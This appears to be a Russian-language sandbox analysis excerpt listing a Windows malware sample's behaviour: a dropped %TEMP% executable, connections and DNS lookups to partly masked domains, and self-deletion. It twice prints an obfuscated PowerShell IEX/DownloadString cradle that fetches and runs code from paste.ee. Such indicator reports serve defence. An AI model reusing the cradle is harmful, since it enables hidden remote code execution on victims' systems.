Техническая информация
- http://si###ongroup.ru/wp-admin/bin.exe как %temp%\qmbrki.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')
- %WINDIR%\explorer.exe
- %TEMP%\qmbrki.exe
- %TEMP%\qmbrki.exe
- 'pa##e.ee':80
- 'pa##e.ee':443
- 'si###ongroup.ru':80
- 'mi###agon.com':80
- 'st#####dketamine.com':80
- 'an#####iamatkovskia.com':80
- 'si###ytomas.com':80
- 'ab###club.com':80
- 'sa####magazine.com':80
- 'dm###arch.com':80
- 'pa##e.ee':443
- DNS ASK pa##e.ee
- DNS ASK si###ongroup.ru
- DNS ASK mi###agon.com
- DNS ASK st#####dketamine.com
- DNS ASK gr###vikov.info
- DNS ASK an#####iamatkovskia.com
- DNS ASK si###ytomas.com
- DNS ASK ab###club.com
- DNS ASK xh##021.com
- DNS ASK ko####ieitai.info
- DNS ASK sa####magazine.com
- DNS ASK av####sorsinc.com
- DNS ASK dm###arch.com
- '%TEMP%\qmbrki.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')' (со скрытым окном)
- '%WINDIR%\syswow64\wuapp.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%TEMP%\qMBRkI.exe"